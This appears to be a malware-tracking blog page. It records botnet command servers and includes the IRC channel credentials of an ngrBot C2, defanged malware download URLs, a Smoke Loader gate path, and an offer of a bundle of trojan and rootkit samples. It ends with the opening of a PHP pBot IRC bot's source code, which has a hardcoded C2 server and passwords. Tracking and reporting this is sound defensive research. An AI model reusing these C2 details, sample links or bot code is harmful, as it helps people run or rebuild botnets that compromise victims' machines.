208.117.34.145(ngrBot hosted in United States Chicago Steadfast Networks)

Uncategorized

Server: 208.117.34.145:1887 Server:185.12.14.131:1887 Username: eyaimlr Nickname: n{DE|XPa}eyaimlr Channel: #bon2 (Password: speedd) Channeltopic: :~pu hxxp://www.sendspace.com/pro/dl/ppbf96 26bc0e7256f2a7fb536bdd19e0464e49 ~s -o ~s Download URLs hxxp://69.31.136.17/dlpro/29c185ae59e68f635192223e650939a3/50fe994c/ppbf96/mariayonosy.exe (fs03n5.sendspace.com) hosting infos: http://whois.domaintools.com/208.117.34.145

105mb samples

Uncategorized

This package contains irc bots.banking trojans,rootkits and other samples Only for analysing purposes Source Source

imageshoster.ru (Smoke loader http botnet hosted by santrex.net)

Uncategorized

Resolved imageshoster.ru to 46.166.169.187 Server:  imageshoster.ru Gate file:  /pics/index.php This is the new smokebot domain of the beerpigfarm.ru installs guy. His previously domain adzu324nbasmdaoias.su is currently hosted on the same server. Sample: hxxp://46.166.177.120/smo Hosting infos: http://whois.domaintools.com/46.166.169.187

irc.by(Linux pBots hosted in Netherlands Netrc Llc)

Uncategorized

Resolved : [irc.by] To [91.214.111.26] Here is the pBot: <!-- set_time_limit(0); error_reporting(0); class pBot { var config = array("server"=>"irc.by", "port"=>6669, "pass"=>"fx", "prefix"=>"fvox", "maxrand"=>8, "chan"=>"#webs", "key"=>"", "modes"=>"+iB-x", "password"=>"webs", "trigger"=>".", "hostauth"=>"Click.Here.To.Install.These.Updates" // * for any hostname ); var users = array(); function start() { if(!(this->conn = fsockopen(this->config['server'],this->config['port'],e,s,30))) this->start(); ident = ""; alph = range("a","z"); for(i=0;i<this->config['maxrand'];i++) ident .=Read more...